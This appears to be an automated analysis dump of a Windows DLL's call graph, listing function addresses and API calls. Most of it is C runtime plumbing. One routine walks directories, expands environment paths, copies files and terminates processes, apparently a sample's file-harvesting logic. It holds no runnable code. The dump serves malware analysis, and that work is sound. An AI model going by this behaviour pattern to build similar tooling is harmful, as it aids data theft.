6bee67af GetLastError 16791->16792 16793 6bee67ac 16791->16793 16794 6bee7973 ___vcrt_FlsGetValue 6 API calls 16792->16794 16793->16787 16795 6bee67c4 16794->16795 16796 6bee6829 SetLastError 16795->16796 16797 6bee79ae ___vcrt_FlsSetValue 6 API calls 16795->16797 16804 6bee67e3 16795->16804 16796->16787 16799 6bee67dd __InternalCxxFrameHandler 16797->16799 16798 6bee6805 16800 6bee79ae ___vcrt_FlsSetValue 6 API calls 16798->16800 16802 6bee6819 16798->16802 16799->16798 16801 6bee79ae ___vcrt_FlsSetValue 6 API calls 16799->16801 16799->16804 16800->16802 16801->16798 16803 6beed5ab ___vcrt_freefls@4 14 API calls 16802->16803 16803->16804 16804->16796 17323 6bee53c0 17324 6bee53cc 17323->17324 17328 6bee53e2 17324->17328 17329 6beeecc6 17324->17329 17326 6bee53da 17327 6bee672f ___scrt_uninitialize_crt 7 API calls 17326->17327 17327->17328 17330 6beeece3 ___scrt_uninitialize_crt 17329->17330 17331 6beeecd1 17329->17331 17330->17326 17332 6beeecdf 17331->17332 17334 6bef1e26 17331->17334 17332->17326 17337 6bef1cb7 17334->17337 17340 6bef1c0b 17337->17340 17341 6bef1c17 __FrameHandler3::FrameUnwindToState 17340->17341 17348 6bef351f RtlEnterCriticalSection 17341->17348 17343 6bef1c21 ___scrt_uninitialize_crt 17344 6bef1c8d 17343->17344 17349 6bef1b7f 17343->17349 17357 6bef1cab 17344->17357 17348->17343 17350 6bef1b8b __FrameHandler3::FrameUnwindToState 17349->17350 17360 6beecc7d RtlEnterCriticalSection 17350->17360 17352 6bef1b95 ___scrt_uninitialize_crt 17356 6bef1bce 17352->17356 17361 6bef1dc1 17352->17361 17374 6bef1bff 17356->17374 17407 6bef3567 RtlLeaveCriticalSection 17357->17407 17359 6bef1c99 17359->17332 17360->17352 17362 6bef1dd6 __vfwprintf_l 17361->17362 17363 6bef1ddd 17362->17363 17364 6bef1de8 17362->17364 17365 6bef1cb7 ___scrt_uninitialize_crt 68 API calls 17363->17365 17366 6bef1d58 __vfwprintf_l 64 API calls 17364->17366 17373 6bef1de3 17365->17373 17367 6bef1df2 17366->17367 17370 6beeeea2 __fread_nolock 39 API calls 17367->17370 17367->17373 17368 6bee7d4e __vfwprintf_l 39 API calls 17369 6bef1e20 17368->17369 17369->17356 17371 6bef1e09 17370->17371 17377 6bef7a65 17371->17377 17373->17368 17406 6beecc91 RtlLeaveCriticalSection 17374->17406 17376 6bef1bed 17376->17343 17378 6bef7a76 17377->17378 17379 6bef7a83 17377->17379 17381 6bef0431 __dosmaperr 14 API calls 17378->17381 17380 6bef7acc 17379->17380 17384 6bef7aaa 17379->17384 17382 6bef0431 __dosmaperr 14 API calls 17380->17382 17383 6bef7a7b 17381->17383 17385 6bef7ad1 17382->17385 17383->17373 17388 6bef79c3 17384->17388 17387 6beedef9 __wsopen_s 39 API calls 17385->17387 17387->17383 17389 6bef79cf __FrameHandler3::FrameUnwindToState 17388->17389 17401 6bef5062 RtlEnterCriticalSection 17389->17401 17391 6bef79de 17392 6bef52de __wsopen_s 39 API calls 17391->17392 17399 6bef7a23 17391->17399 17394 6bef7a0a FlushFileBuffers 17392->17394 17393 6bef0431 __dosmaperr 14 API calls 17395 6bef7a2a 17393->17395 17394->17395 17396 6bef7a16 GetLastError 17394->17396 17402 6bef7a59 17395->17402 17397 6bef041e __dosmaperr 14 API calls 17396->17397 17397->17399 17399->17393 17401->17391 17405 6bef5117 RtlLeaveCriticalSection 17402->17405 17404 6bef7a42 17404->17383 17405->17404 17406->17376 17407->17359 17817 6bee633a 17820 6bee6388 17817->17820 17821 6bee6345 17820->17821 17822 6bee6391 17820->17822 17822->17821 17829 6bee6795 17822->17829 17825 6bee6795 __InternalCxxFrameHandler 49 API calls 17826 6bee63d7 17825->17826 17843 6beeed08 17826->17843 17830 6bee67a3 __InternalCxxFrameHandler 23 API calls 17829->17830 17831 6bee679a 17830->17831 17832 6bee63cc 17831->17832 17849 6bef4c7b 17831->17849 17832->17825 17835 6beeed54 17837 6beeed5e IsProcessorFeaturePresent 17835->17837 17838 6beeed7d 17835->17838 17839 6beeed6a 17837->17839 17879 6beee4c9 17838->17879 17841 6beedcfd __InternalCxxFrameHandler 8 API calls 17839->17841 17841->17838 17844 6beeed14 __FrameHandler3::FrameUnwindToState 17843->17844 17845 6beef497 _unexpected 39 API calls 17844->17845 17848 6beeed19 17845->17848 17846 6beeed44 __FrameHandler3::FrameUnwindToState 39 API calls 17847 6beeed43 17846->17847 17848->17846 17882 6bef4ba9 17849->17882 17852 6bef4cc0 17853 6bef4ccc __FrameHandler3::FrameUnwindToState 17852->17853 17854 6beef5e8 __dosmaperr 14 API calls 17853->17854 17855 6bef4d1c 17853->17855 17857 6bef4d2e __InternalCxxFrameHandler 17853->17857 17862 6bef4cfd __InternalCxxFrameHandler 17853->17862 17854->17862 17856 6bef0431 __dosmaperr 14 API calls 17855->17856 17858 6bef4d21 17856->17858 17859 6bef4d64 __InternalCxxFrameHandler 17857->17859 17893 6bef351f RtlEnterCriticalSection 17857->17893 17860 6beedef9 __wsopen_s 39 API calls 17858->17860 17864 6bef4e9e 17859->17864 17865 6bef4da1 17859->17865 17875 6bef4dcf 17859->17875 17878 6bef4d06 17860->17878 17862->17855 17862->17857 17862->17878 17867 6bef4ea9 17864->17867 17898 6bef3567 RtlLeaveCriticalSection 17864->17898 17871 6beef497 _unexpected 39 API calls 17865->17871 17865->17875 17868 6beee4c9 __InternalCxxFrameHandler 21 API calls 17867->17868 17870 6bef4eb1 17868->17870 17873 6bef4dc4 17871->17873 17872 6beef497 _unexpected 39 API calls 17876 6bef4e24 17872->17876 17874 6beef497 _unexpected 39 API calls 17873->17874 17874->17875 17894 6bef4e4a 17875->17894 17877 6beef497 _unexpected 39 API calls 17876->17877 17876->17878 17877->17878 17878->17835 17900 6beee306 17879->17900 17883 6bef4bb5 __FrameHandler3::FrameUnwindToState 17882->17883 17888 6bef351f RtlEnterCriticalSection 17883->17888 17885 6bef4bc3 17889 6bef4c05 17885->17889 17888->17885 17892 6bef3567 RtlLeaveCriticalSection 17889->17892 17891 6beeed49 17891->17835 17891->17852 17892->17891 17893->17859 17895 6bef4e4e 17894->17895 17897 6bef4e16 17894->17897 17899 6bef3567 RtlLeaveCriticalSection 17895->17899 17897->17872 17897->17876 17897->17878 17898->17867 17899->17897 17901 6beee333 17900->17901 17910 6beee344 17900->17910 17911 6beee3ce GetModuleHandleW 17901->17911 17906 6beee382 17918 6beee1d1 17910->17918 17912 6beee338 17911->17912 17912->17910 17913 6beee429 GetModuleHandleExW 17912->17913 17914 6beee468 GetProcAddress 17913->17914 17915 6beee47c 17913->17915 17914->17915 17916 6beee48f FreeLibrary 17915->17916 17917 6beee498 17915->17917 17916->17917 17917->17910 17919 6beee1dd __FrameHandler3::FrameUnwindToState 17918->17919 17933 6bef351f RtlEnterCriticalSection 17919->17933 17921 6beee1e7 17934 6beee21e 17921->17934 17923 6beee1f4 17938 6beee212 17923->17938 17926 6beee39d 17963 6beee410 17926->17963 17928 6beee3a7 17929 6beee3bb 17928->17929 17930 6beee3ab GetCurrentProcess TerminateProcess 17928->17930 17931 6beee429 __InternalCxxFrameHandler 3 API calls 17929->17931 17930->17929 17932 6beee3c3 ExitProcess 17931->17932 17933->17921 17936 6beee22a __InternalCxxFrameHandler __FrameHandler3::FrameUnwindToState 17934->17936 17935 6beee28e __InternalCxxFrameHandler 17935->17923 17936->17935 17941 6beeeb1d 17936->17941 17962 6bef3567 RtlLeaveCriticalSection 17938->17962 17940 6beee200 17940->17906 17940->17926 17942 6beeeb29 __EH_prolog3 17941->17942 17945 6beee9e8 17942->17945 17944 6beeeb50 __InternalCxxFrameHandler 17944->17935 17946 6beee9f4 __FrameHandler3::FrameUnwindToState 17945->17946 17953 6bef351f RtlEnterCriticalSection 17946->17953 17948 6beeea02 17954 6beeea43 17948->17954 17953->17948 17955 6beeea0f 17954->17955 17956 6beeea62 17954->17956 17958 6beeea37 17955->17958 17956->17955 17957 6bef0444 __freea 14 API calls 17956->17957 17957->17955 17961 6bef3567 RtlLeaveCriticalSection 17958->17961 17960 6beeea20 17960->17944 17961->17960 17962->17940 17966 6bef35a3 17963->17966 17965 6beee415 __InternalCxxFrameHandler 17965->17928 17967 6bef35b2 __InternalCxxFrameHandler 17966->17967 17968 6bef35bf 17967->17968 17970 6bef1853 17967->17970 17968->17965 17971 6bef17ce _unexpected 5 API calls 17970->17971 17972 6bef186f 17971->17972 17972->17968 18728 6beecc31 18729 6bef1e26 ___scrt_uninitialize_crt 68 API calls 18728->18729 18730 6beecc39 18729->18730 18738 6bef1ad4 18730->18738 18732 6beecc3e 18733 6bef1e2f __DllMainCRTStartup@12 14 API calls 18732->18733 18734 6beecc4d RtlDeleteCriticalSection 18733->18734 18734->18732 18735 6beecc68 18734->18735 18736 6bef0444 __freea 14 API calls 18735->18736 18737 6beecc73 18736->18737 18739 6bef1ae0 __FrameHandler3::FrameUnwindToState 18738->18739 18748 6bef351f RtlEnterCriticalSection 18739->18748 18741 6bef1b57 18749 6bef1b76 18741->18749 18743 6bef1aeb 18743->18741 18745 6bef1b2b RtlDeleteCriticalSection 18743->18745 18747 6beecec7 __DllMainCRTStartup@12 69 API calls 18743->18747 18746 6bef0444 __freea 14 API calls 18745->18746 18746->18743 18747->18743 18748->18743 18752 6bef3567 RtlLeaveCriticalSection 18749->18752 18751 6bef1b63 18751->18732 18752->18751 16805 6bee4e89 16806 6bee4e97 16805->16806 16807 6bee4e92 16805->16807 16811 6bee4d53 16806->16811 16825 6bee508a 16807->16825 16812 6bee4d5f __FrameHandler3::FrameUnwindToState 16811->16812 16813 6bee4d88 dllmain_raw 16812->16813 16814 6bee4d83 16812->16814 16823 6bee4d6e 16812->16823 16815 6bee4da2 dllmain_crt_dispatch 16813->16815 16813->16823 16829 6bee1000 16814->16829 16815->16814 16815->16823 16826 6bee50a0 16825->16826 16828 6bee50a9 16826->16828 16924 6bee503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16826->16924 16828->16806 16830 6bee1012 16829->16830 16831 6bee1010 16829->16831 16834 6bee4402 16830->16834 16835 6bee4430 __fread_nolock 16834->16835 16880 6bee171f 16835->16880 16838 6bee1135 __DllMainCRTStartup@12 44 API calls 16839 6bee4456 __DllMainCRTStartup@12 _strlen 16838->16839 16840 6bee1075 __DllMainCRTStartup@12 43 API calls 16839->16840 16841 6bee44ae 16840->16841 16842 6beed5ab ___vcrt_freefls@4 14 API calls 16841->16842 16843 6bee44b9 GetEnvironmentVariableW 16842->16843 16844 6bee1135 __DllMainCRTStartup@12 44 API calls 16843->16844 16845 6bee44e6 __DllMainCRTStartup@12 _strlen 16844->16845 16846 6bee1075 __DllMainCRTStartup@12 43 API calls 16845->16846 16847 6bee4545 16846->16847 16848 6beed5ab ___vcrt_freefls@4 14 API calls 16847->16848 16849 6bee4550 16848->16849 16850 6bee1135 __DllMainCRTStartup@12 44 API calls 16849->16850 16851 6bee4567 __DllMainCRTStartup@12 _strlen 16850->16851 16852 6bee1075 __DllMainCRTStartup@12 43 API calls 16851->16852 16853 6bee45bc 16852->16853 16854 6beed5ab ___vcrt_freefls@4 14 API calls 16853->16854 16855 6bee45c7 16854->16855 16856 6bee1135 __DllMainCRTStartup@12 44 API calls 16855->16856 16857 6bee45de __DllMainCRTStartup@12 _strlen 16856->16857 16858 6bee1075 __DllMainCRTStartup@12 43 API calls 16857->16858 16859 6bee4636 16858->16859 16860 6beed5ab ___vcrt_freefls@4 14 API calls 16859->16860 16922 6bee6180 16880->16922 16883 6bee1135 __DllMainCRTStartup@12 44 API calls 16885 6bee1775 __DllMainCRTStartup@12 _strlen 16883->16885 16884 6bee17d8 GetProcAddress 16886 6beed5ab ___vcrt_freefls@4 14 API calls 16884->16886 16885->16884 16887 6bee17f5 16886->16887 16888 6bee1135 __DllMainCRTStartup@12 44 API calls 16887->16888 16890 6bee1806 __DllMainCRTStartup@12 _strlen 16888->16890 16889 6bee1869 GetProcAddress 16891 6beed5ab ___vcrt_freefls@4 14 API calls 16889->16891 16890->16889 16892 6bee1886 16891->16892 16893 6bee1135 __DllMainCRTStartup@12 44 API calls 16892->16893 16895 6bee1897 __DllMainCRTStartup@12 _strlen 16893->16895 16894 6bee18fa GetProcAddress 16896 6beed5ab ___vcrt_freefls@4 14 API calls 16894->16896 16895->16894 16897 6bee1917 16896->16897 16898 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16897->16898 16899 6bee1927 16898->16899 16899->16838 16923 6bee174a GetModuleHandleW 16922->16923 16923->16883 16924->16828 17980 6bef4b07 17981 6bef4b20 17980->17981 17982 6bef4b3e 17980->17982 17981->17982 17983 6bef0258 2 API calls 17981->17983 17984 6bef0308 44 API calls 17981->17984 17983->17981 17984->17981 14330 6bee1c1a 14331 6bee1c21 14330->14331 14332 6bee1fbf 14331->14332 14338 6bee1c2b 14331->14338 14734 6bee32d8 14332->14734 14334 6bee1c47 14335 6bee1fd2 14336 6bee32d8 __DllMainCRTStartup@12 39 API calls 14335->14336 14337 6bee1fe1 14336->14337 14737 6bee4ad5 14337->14737 14338->14334 14340 6bee1fa5 FindNextFileW 14338->14340 14349 6bee1d10 __DllMainCRTStartup@12 _strlen 14338->14349 14365 6bee1075 14338->14365 14368 6bee1b85 14338->14368 14340->14334 14340->14338 14342 6bee1ffc 14345 6bee1075 __DllMainCRTStartup@12 43 API calls 14346 6bee1f5e TerminateProcess CloseHandle CloseHandle 14345->14346 14691 6bee2004 14346->14691 14349->14345 14350 6bee1075 __DllMainCRTStartup@12 43 API calls 14349->14350 14406 6bee1135 14349->14406 14409 6beed5ab 14349->14409 14350->14349 14356 6bee32d8 39 API calls __DllMainCRTStartup@12 14360 6bee1db2 14356->14360 14358 6bee3389 __DllMainCRTStartup@12 40 API calls 14358->14360 14359 6bee33f1 40 API calls __DllMainCRTStartup@12 14359->14360 14360->14356 14360->14358 14360->14359 14363 6bee1075 __DllMainCRTStartup@12 43 API calls 14360->14363 14416 6bee3854 14360->14416 14419 6bee32f1 14360->14419 14423 6bee32c2 14360->14423 14426 6bee16ba 14360->14426 14430 6bee2430 CoInitialize 14360->14430 14364 6bee1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 14363->14364 14364->14338 14744 6bee1035 14365->14744 14369 6bee1bca __DllMainCRTStartup@12 14368->14369 14370 6bee1075 __DllMainCRTStartup@12 43 API calls 14369->14370 14371 6bee1bfd FindFirstFileW 14370->14371 14372 6bee1c21 14371->14372 14373 6bee1fbf 14372->14373 14383 6bee1c2b 14372->14383 14374 6bee32d8 __DllMainCRTStartup@12 39 API calls 14373->14374 14376 6bee1fd2 14374->14376 14375 6bee1c47 14375->14338 14377 6bee32d8 __DllMainCRTStartup@12 39 API calls 14376->14377 14378 6bee1fe1 14377->14378 14379 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14378->14379 14382 6bee1ffc 14379->14382 14380 6bee1fa5 FindNextFileW 14380->14375 14380->14383 14381 6bee1075 __DllMainCRTStartup@12 43 API calls 14381->14383 14382->14338 14383->14375 14383->14380 14383->14381 14384 6bee1b85 __DllMainCRTStartup@12 92 API calls 14383->14384 14390 6bee1d10 __DllMainCRTStartup@12 _strlen 14383->14390 14384->14383 14385 6bee1135 __DllMainCRTStartup@12 44 API calls 14385->14390 14386 6bee1075 __DllMainCRTStartup@12 43 API calls 14387 6bee1f5e TerminateProcess CloseHandle CloseHandle 14386->14387 14388 6bee2004 __DllMainCRTStartup@12 81 API calls 14387->14388 14389 6bee1fa3 14388->14389 14389->14380 14390->14385 14390->14386 14391 6bee1075 __DllMainCRTStartup@12 43 API calls 14390->14391 14392 6beed5ab ___vcrt_freefls@4 14 API calls 14390->14392 14391->14390 14393 6bee1d89 ExpandEnvironmentStringsW 14392->14393 14394 6bee3389 __DllMainCRTStartup@12 40 API calls 14393->14394 14403 6bee1db2 14394->14403 14395 6bee3854 __DllMainCRTStartup@12 40 API calls 14395->14403 14396 6bee32f1 __DllMainCRTStartup@12 39 API calls 14396->14403 14397 6bee32d8 39 API calls __DllMainCRTStartup@12 14397->14403 14398 6bee32c2 __DllMainCRTStartup@12 40 API calls 14398->14403 14399 6bee3389 __DllMainCRTStartup@12 40 API calls 14399->14403 14400 6bee33f1 40 API calls __DllMainCRTStartup@12 14400->14403 14401 6bee16ba __DllMainCRTStartup@12 39 API calls 14401->14403 14402 6bee2430 __DllMainCRTStartup@12 78 API calls 14402->14403 14403->14395 14403->14396 14403->14397 14403->14398 14403->14399 14403->14400 14403->14401 14403->14402 14404 6bee1075 __DllMainCRTStartup@12 43 API calls 14403->14404 14405 6bee1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 14404->14405 14405->14383 15275 6bee10f5 14406->15275 14410 6bef0444 __freea 14 API calls 14409->14410 14411 6bee1d89 ExpandEnvironmentStringsW 14410->14411 14412 6bee3389 14411->14412 14413 6bee33bb __DllMainCRTStartup@12 14412->14413 15455 6bee38b4 14413->15455 15567 6bee3cbc 14416->15567 14418 6bee3869 __DllMainCRTStartup@12 14418->14360 14421 6bee3302 __DllMainCRTStartup@12 14419->14421 14420 6bee3308 __DllMainCRTStartup@12 14420->14360 14421->14420 15618 6bee34ca 14421->15618 15622 6bee329b 14423->15622 14427 6bee16ca __DllMainCRTStartup@12 14426->14427 14428 6bee32d8 __DllMainCRTStartup@12 39 API calls 14427->14428 14429 6bee171a 14428->14429 14429->14360 14431 6bee2491 14430->14431 14432 6bee249a 14431->14432 14433 6bee24eb 14431->14433 15643 6bee10c5 14432->15643 15647 6bee33f1 14433->15647 14440 6bee32d8 __DllMainCRTStartup@12 39 API calls 14443 6bee24c5 14440->14443 14442 6bee2519 15659 6bee1654 VariantInit 14442->15659 14445 6bee32d8 __DllMainCRTStartup@12 39 API calls 14443->14445 14447 6bee24d1 14445->14447 14446 6bee253e 15660 6bee1654 VariantInit 14446->15660 14449 6bee32d8 __DllMainCRTStartup@12 39 API calls 14447->14449 14617 6bee24e0 14449->14617 14450 6bee2563 15661 6bee1654 VariantInit 14450->15661 14452 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14454 6bee325d 14452->14454 14453 6bee2588 15662 6bee16a8 VariantClear 14453->15662 14454->14360 14456 6bee25fb 15663 6bee16a8 VariantClear 14456->15663 14458 6bee260a 15664 6bee16a8 VariantClear 14458->15664 14617->14452 15921 6beecd5b 14691->15921 14695 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14697 6bee1fa3 14695->14697 14697->14340 14702 6beecd5b __DllMainCRTStartup@12 42 API calls 14703 6bee208f ___std_exception_copy 14702->14703 15949 6beedb99 14703->15949 14705 6bee20bb __DllMainCRTStartup@12 15952 6beecb0d 14705->15952 14733 6bee2065 14733->14695 14735 6bee34ca __DllMainCRTStartup@12 39 API calls 14734->14735 14736 6bee32e7 __DllMainCRTStartup@12 14735->14736 14736->14335 14738 6bee4ade IsProcessorFeaturePresent 14737->14738 14739 6bee4add 14737->14739 14741 6bee4f19 14738->14741 14739->14342 16498 6bee4edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14741->16498 14743 6bee4ffc 14743->14342 14745 6bee104e __vfwprintf_l 14744->14745 14748 6beec76c 14745->14748 14749 6beec780 __vfwprintf_l 14748->14749 14754 6bee85e0 14749->14754 14755 6bee860f 14754->14755 14756 6bee85ec 14754->14756 14758 6bee8636 14755->14758 14777 6bee83be 14755->14777 14768 6beede7c 14756->14768 14760 6beede7c __vfwprintf_l 29 API calls 14758->14760 14761 6bee8607 14758->14761 14760->14761 14762 6bee7d4e 14761->14762 14763 6bee7d5a 14762->14763 14764 6bee7d71 14763->14764 14765 6bee8197 __vfwprintf_l 39 API calls 14763->14765 14766 6bee1058 14764->14766 14767 6bee8197 __vfwprintf_l 39 API calls 14764->14767 14765->14764 14766->14338 14767->14766 14769 6beede8c 14768->14769 14770 6beede93 14768->14770 14788 6bee8151 GetLastError 14769->14788 14775 6beedea1 14770->14775 14792 6beedcd4 14770->14792 14773 6beedec8 14773->14775 14795 6beedf26 IsProcessorFeaturePresent 14773->14795 14775->14761 14776 6beedef8 14778 6bee840d 14777->14778 14779 6bee83ea 14777->14779 14778->14779 14781 6bee8415 __DllMainCRTStartup@12 14778->14781 14780 6beede7c __vfwprintf_l 29 API calls 14779->14780 14787 6bee8402 14780->14787 14930 6beea9ff 14781->14930 14782 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14783 6bee853f 14782->14783 14783->14758 14787->14782 14789 6bee816a 14788->14789 14799 6beef699 14789->14799 14793 6beedcdf GetLastError SetLastError 14792->14793 14794 6beedcf8 14792->14794 14793->14773 14794->14773 14796 6beedf32 14795->14796 14924 6beedcfd 14796->14924 14800 6beef6ac 14799->14800 14804 6beef6b2 14799->14804 14821 6bef1930 14800->14821 14820 6bee8182 SetLastError 14804->14820 14826 6bef196f 14804->14826 14807 6beef6f9 14809 6bef196f _unexpected 6 API calls 14807->14809 14808 6beef6e4 14810 6bef196f _unexpected 6 API calls 14808->14810 14811 6beef705 14809->14811 14812 6beef6f0 14810->14812 14813 6beef718 14811->14813 14814 6beef709 14811->14814 14838 6bef0444 14812->14838 14844 6beef299 14813->14844 14815 6bef196f _unexpected 6 API calls 14814->14815 14815->14812 14819 6bef0444 __freea 14 API calls 14819->14820 14820->14770 14849 6bef17ce 14821->14849 14823 6bef194c 14824 6bef1967 TlsGetValue 14823->14824 14825 6bef1955 14823->14825 14825->14804 14827 6bef17ce _unexpected 5 API calls 14826->14827 14828 6bef198b 14827->14828 14829 6bef19a9 TlsSetValue 14828->14829 14830 6beef6cc 14828->14830 14830->14820 14831 6bef1658 14830->14831 14836 6bef1665 _unexpected 14831->14836 14832 6bef16a5 14866 6bef0431 14832->14866 14833 6bef1690 RtlAllocateHeap 14834 6beef6dc 14833->14834 14833->14836 14834->14807 14834->14808 14836->14832 14836->14833 14863 6beedf8f 14836->14863 14839 6bef044f HeapFree 14838->14839 14840 6bef0479 14838->14840 14839->14840 14841 6bef0464 GetLastError 14839->14841 14840->14820 14842 6bef0471 __dosmaperr 14841->14842 14843 6bef0431 __dosmaperr 12 API calls 14842->14843 14843->14840 14898 6beef12d 14844->14898 14850 6bef17fe 14849->14850 14854 6bef17fa _unexpected 14849->14854 14850->14854 14855 6bef1703 14850->14855 14853 6bef1818 GetProcAddress 14853->14854 14854->14823 14861 6bef1714 ___vcrt_FlsSetValue 14855->14861 14856 6bef17aa 14856->14853 14856->14854 14857 6bef1732 LoadLibraryExW 14858 6bef174d GetLastError 14857->14858 14859 6bef17b1 14857->14859 14858->14861 14859->14856 14860 6bef17c3 FreeLibrary 14859->14860 14860->14856 14861->14856 14861->14857 14862 6bef1780 LoadLibraryExW 14861->14862 14862->14859 14862->14861 14869 6beedfbb 14863->14869 14875 6beef5e8 GetLastError 14866->14875 14868 6bef0436 14868->14834 14870 6beedfc7 __FrameHandler3::FrameUnwindToState 14869->14870 14871 6bef351f __InternalCxxFrameHandler RtlEnterCriticalSection 14870->14871 14872 6beedfd2 __InternalCxxFrameHandler 14871->14872 14873 6beee009 _unexpected RtlLeaveCriticalSection 14872->14873 14874 6beedf9a 14873->14874 14874->14836 14876 6beef5fe 14875->14876 14880 6beef604 14875->14880 14877 6bef1930 _unexpected 6 API calls 14876->14877 14877->14880 14878 6bef196f _unexpected 6 API calls 14879 6beef620 14878->14879 14882 6bef1658 _unexpected 12 API calls 14879->14882 14895 6beef608 SetLastError 14879->14895 14880->14878 14880->14895 14883 6beef635 14882->14883 14884 6beef64e 14883->14884 14885 6beef63d 14883->14885 14886 6bef196f _unexpected 6 API calls 14884->14886 14887 6bef196f _unexpected 6 API calls 14885->14887 14888 6beef65a 14886->14888 14889 6beef64b 14887->14889 14890 6beef65e 14888->14890 14891 6beef675 14888->14891 14893 6bef0444 __freea 12 API calls 14889->14893 14892 6bef196f _unexpected 6 API calls 14890->14892 14894 6beef299 _unexpected 12 API calls 14891->14894 14892->14889 14893->14895 14896 6beef680 14894->14896 14895->14868 14897 6bef0444 __freea 12 API calls 14896->14897 14897->14895 14899 6beef139 __FrameHandler3::FrameUnwindToState 14898->14899 14912 6bef351f RtlEnterCriticalSection 14899->14912 14901 6beef143 14913 6beef173 14901->14913 14904 6beef23f 14905 6beef24b __FrameHandler3::FrameUnwindToState 14904->14905 14916 6bef351f RtlEnterCriticalSection 14905->14916 14907 6beef255 14917 6beef420 14907->14917 14909 6beef26d 14921 6beef28d 14909->14921 14912->14901 14914 6bef3567 __InternalCxxFrameHandler RtlLeaveCriticalSection 14913->14914 14915 6beef161 14914->14915 14915->14904 14916->14907 14918 6beef456 _unexpected 14917->14918 14919 6beef42f _unexpected 14917->14919 14918->14909 14919->14918 14920 6bef53c5 _unexpected 14 API calls 14919->14920 14920->14918 14922 6bef3567 __InternalCxxFrameHandler RtlLeaveCriticalSection 14921->14922 14923 6beef27b 14922->14923 14923->14819 14925 6beedd19 __InternalCxxFrameHandler __fread_nolock 14924->14925 14926 6beedd45 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14925->14926 14927 6beede16 __InternalCxxFrameHandler 14926->14927 14928 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14927->14928 14929 6beede34 GetCurrentProcess TerminateProcess 14928->14929 14929->14776 14942 6beec3ce 14930->14942 14932 6beeaa1f 14933 6beede7c __vfwprintf_l 29 API calls 14932->14933 14934 6bee8496 14933->14934 14939 6beea12f 14934->14939 14937 6beeaa14 __DllMainCRTStartup@12 14937->14932 14937->14934 14946 6beea3f1 14937->14946 14949 6beeaef1 14937->14949 14990 6beeb71c 14937->14990 14940 6bef0444 __freea 14 API calls 14939->14940 14941 6beea13f 14940->14941 14941->14787 14943 6beec3f2 14942->14943 14944 6beec3d9 14942->14944 14943->14937 14945 6beede7c __vfwprintf_l 29 API calls 14944->14945 14945->14943 15026 6bee8a8b 14946->15026 14948 6beea42e 14948->14937 14950 6beeaeff 14949->14950 14951 6beeaf17 14949->14951 14953 6beeaf58 14950->14953 14954 6beeb74a 14950->14954 14955 6beeb7b4 14950->14955 14952 6beede7c __vfwprintf_l 29 API calls 14951->14952 14951->14953 14956 6beeaf4c 14952->14956 14953->14937 14959 6beeb7dc 14954->14959 14960 6beeb750 14954->14960 14957 6beeb7b9 14955->14957 14958 6beeb7f3 14955->14958 14956->14937 14961 6beeb7ea 14957->14961 14962 6beeb7bb 14957->14962 14963 6beeb7f8 14958->14963 14964 6beeb812 14958->14964 15078 6bee9528 14959->15078 14965 6beeb755 14960->14965 14966 6beeb781 14960->14966 15085 6beec141 14961->15085 14973 6beeb763 14962->14973 14979 6beeb7ca 14962->14979 14967 6beeb809 14963->14967 14970 6beeb7fd 14963->14970 15093 6beec174 14964->15093 14965->14967 14971 6beeb75b 14965->14971 14966->14971 14975 6beeb7a9 14966->14975 15089 6beec1fc 14967->15089 14970->14959 14970->14975 14971->14973 14977 6beeb78e 14971->14977 14987 6beeb77c __DllMainCRTStartup@12 14971->14987 14986 6beeb81d __DllMainCRTStartup@12 14973->14986 15051 6beebdbb 14973->15051 14975->14986 15067 6bee9847 14975->15067 14977->14986 15061 6beebff7 14977->15061 14979->14959 14981 6beeb7ce 14979->14981 14981->14986 15074 6beec09f 14981->15074 14982 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14983 6beebb0e 14982->14983 14983->14937 14986->14982 14987->14986 14989 6beeb9fd 14987->14989 15096 6beec320 14987->15096 14989->14986 15103 6bef124b 14989->15103 14991 6beeb74a 14990->14991 14992 6beeb7b4 14990->14992 14995 6beeb7dc 14991->14995 14996 6beeb750 14991->14996 14993 6beeb7b9 14992->14993 14994 6beeb7f3 14992->14994 14997 6beeb7ea 14993->14997 14998 6beeb7bb 14993->14998 14999 6beeb7f8 14994->14999 15000 6beeb812 14994->15000 15005 6bee9528 __DllMainCRTStartup@12 30 API calls 14995->15005 15001 6beeb755 14996->15001 15002 6beeb781 14996->15002 15006 6beec141 __DllMainCRTStartup@12 30 API calls 14997->15006 15007 6beeb763 14998->15007 15016 6beeb7ca 14998->15016 15004 6beeb809 14999->15004 15008 6beeb7fd 14999->15008 15003 6beec174 __DllMainCRTStartup@12 30 API calls 15000->15003 15001->15004 15009 6beeb75b 15001->15009 15002->15009 15011 6beeb7a9 15002->15011 15023 6beeb77c __DllMainCRTStartup@12 15003->15023 15012 6beec1fc __DllMainCRTStartup@12 39 API calls 15004->15012 15005->15023 15006->15023 15010 6beebdbb __DllMainCRTStartup@12 42 API calls 15007->15010 15013 6beeb81d __DllMainCRTStartup@12 15007->15013 15008->14995 15008->15011 15009->15007 15014 6beeb78e 15009->15014 15009->15023 15010->15023 15011->15013 15015 6bee9847 __DllMainCRTStartup@12 30 API calls 15011->15015 15012->15023 15019 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15013->15019 15014->15013 15018 6beebff7 __DllMainCRTStartup@12 40 API calls 15014->15018 15015->15023 15016->14995 15017 6beeb7ce 15016->15017 15017->15013 15021 6beec09f __vfwprintf_l 29 API calls 15017->15021 15018->15023 15020 6beebb0e 15019->15020 15020->14937 15021->15023 15022 6beec320 __vfwprintf_l 39 API calls 15024 6beeb9fd 15022->15024 15023->15013 15023->15022 15023->15024 15024->15013 15025 6bef124b __wsopen_s 40 API calls 